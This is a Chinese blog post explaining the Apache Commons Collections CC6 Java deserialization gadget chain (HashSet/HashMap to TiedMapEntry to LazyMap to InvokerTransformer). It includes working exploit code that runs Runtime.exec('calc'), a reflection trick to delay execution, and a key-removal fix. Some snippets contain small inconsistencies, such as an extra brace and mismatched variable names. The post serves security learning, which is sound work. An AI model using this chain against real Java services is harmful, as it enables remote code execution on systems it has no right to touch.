java反序列化CommonsCollections6

已于 2023-08-30 18:39:38 修改
阅读量92 收藏
点赞数
文章标签: web安全 安全 java
于 2023-08-30 18:39:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45678034/article/details/132587093
版权

java反序列化CommonsCollections6

文章目录

一、利用链

HashSet.readObject()
HashMap.put()
  HashMap.hash()
     TiedMapEntry.hashCode()
        TiedMapEntry.getValue()
           LazyMap.get()
              ChainedTransformer.transform()
   ConstantTransformer.transform()
                 InvokerTransformer.transform()

二、利用链分析

1.写链子

	我们cc1的LzayMap里面有个get函数,我们往上找是找到了AnnotationInvocationHandler的invoke,这次的cc6链子我们是找到了TiedMapEntry.java的getValue,所以LaztMap后面我们不再分析,只往前找。

在这里插入图片描述
然后就是同类的hashCode()调用了getValue()
在这里插入图片描述

看到了hashCode()我们就想到了HashMap里面的hash()调用了hashCode(),然后readObject()调用了hash()其实cc6和urldns这条链子类似
在这里插入图片描述
为了调用TiedMapEntry.hashCode,得将key设为TiedMapEntry实例,然后再来分析一下TiedMapEntry的getValue
我们得将map设为LazyMap,这个可以通过构造函数传值
在这里插入图片描述
这个链子就变成了

 public static void  main(String[] args) throws Exception {
        Transformer[] transformers = {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers );
        Map hashMap = new HashMap();
        Map lazyMap = LazyMap.decorate(hashMap,chainedTransformer);

        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap,"aaa");
        Map expMap = new HashMap();

        expMap.put(tiedMapEntry,"bbb");
        serialize(expMap);
        unserialize();
    }

但是这样是有问题的,它会在put的时候就会去计算器了,put里也有hash()
在这里插入图片描述
所以我们要让它一开始put的时候是不去执行运行计算器的,然后在后面去通过反射将ChainedTransformer里的iTransformers改为执行计算器的链

        Transformer[] transformers = {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
        Transformer[] constantformers = new Transformer[]{
                new ConstantTransformer(1)
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(constantTransformers);
        Map hashmap = new HashMap();
        Map<Object,Object> lazymap = LazyMap.decorate(innerMap,chainedTransformer);

        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,"aaa");
        Map expMap = new HashMap();

        expMap.put(tiedMapEntry,"bbb");
        
        Class clazz = Class.forName("org.apache.commons.collections.functors.ChainedTransformer");
        Field field = clazz.getDeclaredField("iTransformers");
        field.setAccessible(true);
        field.set(chainedTransformer,transformers);
        serialize(expMap);
        unserialize();

还有一个就是在一开始执行put然后执行到LazyMap.java的get的时候它会执行一个put,添加一个key为aaa,value为1的键值对
在这里插入图片描述
所以我们得将aaa这个键给它删掉,要不然到时反序列化的时候就不能执行命令了。

lazymap.remove("aaa");

在执行完put后添加这一行即可

总结

以上就是今天要讲的内容,还是较为简单的

参考链接 :白日梦组长

._空白_.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ysoserial序列工具包
04-19
首先,我们需要了解什么是Java序列。在Java中,序列是将对象的状态转为字节流的过程,以便存储或通过网络传输。序列则是相的过程,将字节流恢复为原来的对象状态。然而,这个过程可能存在安全风险,...
ysomap:一个基于ysererial的有用的Java序列利用框架
05-14
所以萌生了开发一个更加灵活的框架来扩展序列利用链,也就是当前这个试验品ysomap。 PS:YSOMAP项目为另一个项目的子项目,后续将开源该项目,敬请期待...... #2 原理 我将利用链切分成了两个部分payload和
Java Shiro序列CommonsCollections利用链分析
qq_44192006的博客
04-24 651
本文主要分析CC1利用链,先介绍了复现环境的搭建(该小节尽量帮大家避避坑,呜呜呜);然后紧跟着讲解了java序列和php序列漏洞的区别(希望大家不要有惯性思维认为序列漏洞都一样,其实java序列和php序列的差别还是很大的并介绍了复现学习java序列漏洞所需的一些前置知识;最后,也是文章的主体部分,从Sink(即可以触发执行命令的方法等)、chain及source(即利用链的入口点)三个步骤,讲述利用链的构建。纸上得来终觉浅,绝知此事要躬行。
[Java序列]—CommonsCollections2
Sentiment的博客
06-03 554
CommonsCollections4中通过的方法进行了最后的调用,但是通过这种方式的话会存在一个数组的问题,在shiro等应用中会受到一些影响,所以在CC2中就使用代替了之前的数组部分,算是进行了一个优 分析 整条流程跟CC4差不多,就简单分析下有差异的部分:CC4: CC2: 简单回溯下看看过程:最后要通过调用 所以在实例时,就需要给定方法名,即构造: 之后他要调用的是的方法,所以上边的的input参数就需要是,而往上看一下哪里调用的 是在compare中调用的,而这两个obj的值,就是通过add
Java序列CommonsCollections(CC1)分析篇
qq_44029310的博客
11-23 938
ava序列CommonsCollections篇(CC1)的一些过程分析。
[Java序列]—CommonsCollections3
Sentiment的博客
06-01 833
在了解动态加载字节码文件后,开始学习CC3[Java安全]—动态加载字节码文件前篇了解了动态加载字节码文件,后来在审CC3时发现就是的一个序列延伸,将本条链和CC1的结合起来就能直接命令执行只需要修改这部分即可,即:从原本的到到变成了调用 POC 但这其实不是真正意义上的CC3,CC3的最终目的是绕过⼀些规则对的限制,所以的作者就找到了一个来代替它里边有个构造器,可以执行 且传入的可控 但该类没继承接口所以不能实例,只能通过TrAXFilter.class这种方式来调用了,接着看下哪里能调用该方法就找
Java序列3-CommonsCollections1利用链分析
weixin_43263451的博客
07-06 293
本文分析的是yso中CommonCollections1的payload,其payload前半段前文已经分析过,重点是对后半段的讲解。上一节的payload是利用TransformedMap来完成CommonsCollections链的利用的(当调用put方法时会调用transform方法)这次没有利用TransformedMap,而是利用LazyMap来完成CommonsCollections链的利用,其中还涉及到了动态代理,该payload稍微麻烦了一点。调用链图示:https://blog.csdn.
[Java序列]CommonsCollections2利用链学习
feng的博客
08-28 549
前言 学习自《Java安全漫谈 - 16.commons-collections4与漏洞修复》。学习了一波CC2。学完这个就继续去JavaWeb了。JavaWeb看个1星期就爬取背马原,看概率论了。 预备知识 之前所分析的CC链都是基于CommonsCollections3.2.1及其之前的版本。去maven仓库搜索一下的话,就会发现存在两个CommonsCollections: 一个包名是org.apache.commons.collections4,另外一个是org.apache.commons.co
Java Shiro序列CommonsCollections利用链分析_shiro 利用链
2401_84969008的博客
05-17 1023
下面的分析是按照Source->Chain->Sink链式原则进行推的,其中Source为序列的入口(即重写了readObject方法的类),Chain为利用链,Sink为可以执行任意命令或方法的危险函数。
Java序列CommonsCollections1
weixin_45678034的博客
08-28 89
首先cc1里是有两条链的,一条是TransformerMap,另一条是LazyMap,两条链的后半部分完全相同最终都是利用InvokerTransformer#transform这个函数,因为transform做了一个射操作,如果里面的参数可被我们利用的话,我们则可以用来构建调用链进行攻击Lazymap和TransformedMap的后半部分都是一样的,只不过Lazymap的链子前面用到了代理,更加的巧妙,对于学习者来说是很有帮助的。白日梦组长如月专注。
[Java序列]—CommonsCollections4
Sentiment的博客
06-02 803
之前分析的CC链都是基于CommonsCollections3.2.1及其之前版本的,而后边退出了新的版本,而本篇分析的就是基于CC 4.0版本的(除此外还有CC2)本条链的前半段其实跟CC3一样,都是一个动态加载字节码的过程,而后边构造时,主要用到了两个类和这里ysoseria并没有给出,所以仿照ysoseria总结了一下: PriorityQueue 先看下测试代码: 之所以用它,是因为它重写了自己的方法 最后调用了 接着调用 当comparator不为null时调用 最后调用,而在本类的构造方法中可控
用于生成利用不安全Java对象序列的有效负载的概念验证工具.zip
05-23
Java对象的序列漏洞是一种常见的安全问题,它允许攻击者通过操纵序列过程来执行任意代码。这个概念验证工具,"用于生成利用不安全Java对象序列的有效负载的概念验证工具.zip",旨在帮助安全研究人员和...
ysoserial-master.zip
03-03
防止Java序列漏洞的关键在于限制序列的来源,只信任可信的数据源,并确保所有可序列的类都经过严格的审查。此外,更新到最新版本的库也是必要的,因为许多已知的漏洞会在新版本中得到修复。 6. **防御...
CommonsCollection7序列链学习.doc
07-09
- **Hashtable**:`Hashtable`是Java的一个类,实现了`Map`接口并继承自`Dictionary`类,同时也实现了`Serializable`接口,这意味着它可以被序列序列。与`HashMap`类似,`Hashtable`用于存储键值对,但它是...
【网络安全科普】勒索病毒 防护指南
a38417的博客
07-20 1394
常规的杀毒软件查找病毒的原理一般是对当前计算机上的文件进行特征的检测,检测完成后和现有的病毒库中的特征数据进行匹配,如果可以匹配成功则找到病毒文件,因此现有的勒索病毒对我们常用的常规杀毒软件是一个很大的挑战。一旦勒索病毒感染了计算机,它会立即开始加密用户的文件,包括文档、图片、视频等,并在屏幕上显示要求用户支付赎金的消息。从操作系统来看被植入病毒的主要是Windows XP、Windows 7,原因是目前这些系统中有一部分微软官方已经不再支持更新、以及补丁的维护,一般会存在较多的无法及时修复的漏洞。
网络安全法规对企业做等保有哪些具体规定?
最新发布
gmqqcsdn的博客
07-22 649
企业需根据信息系统被定级的保护等级,执行必要的安全保护措施,包括技术措施和其他必要措施,确保网络免受干扰、破坏或未经授权的访问,防止网络数据泄露或被窃取、篡改。根据《中华人民共和国网络安全法》,企业作为网络运营者,需要履行网络安全等级保护制度的相关义务,确保网络安全和数据保护。:企业应根据网络安全等级保护制度的要求,对其负责运行的信息系统进行安全保护等级的划分,并采取相应级别的安全保护措施。:企业在处理个人信息时,应遵循法律、行政法规的规定,建立个人信息保护影响评估等义务,确保个人信息的合法合规处理。
网络安全常用易混术语定义与解读(Top 20)
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
07-21 1083
没有网络安全就没有国家安全,网络安全已成为每个人都重视的话题。随着技术的飞速发展,各种网络攻击手段层出不穷,保护个人和企业的信息安全显得尤为重要。**然而,在这个复杂的领域中,许多专业术语往往让人感到困惑。为了帮助大家更好地理解网络安全的基本概念和术语,博主整理了20多个常见且容易混淆的专业术语。** 接下来,让我们一起深入探讨这些术语,掌握它们的真正含义!
网络安全领域五大注入攻击类型介绍
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
07-21 1020
SQL注入是最常见的注入攻击类型之一,攻击者通过在输入字段中插入恶意的SQL代码来改变原本的SQL逻辑或执行额外的SQL语句,来操控数据库执行未授权的操作(如拖库、获取管理员信息、获取 WebShell权限等)。XSS攻击允许攻击者在用户的浏览器中执行恶意脚本,通常用于窃取用户的会话信息、Cookies等。应用程序包含射式输入类型时容易出现跨站脚本攻击。比如弹出一个假的窗口骗取用户信息。命令注入攻击允许攻击者在服务器上执行任意命令,通常通过在输入字段中插入系统命令来实现。
Apache shiro 序列工具
05-23
其中,ysoserial 是一个常用的 Java 序列工具,可以生成各种常见的 Java 序列漏洞利用 payload,包括 Apache Shiro、Spring、CommonsCollections 等。使用 ysoserial 生成 Apache Shiro 序列 payload 的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值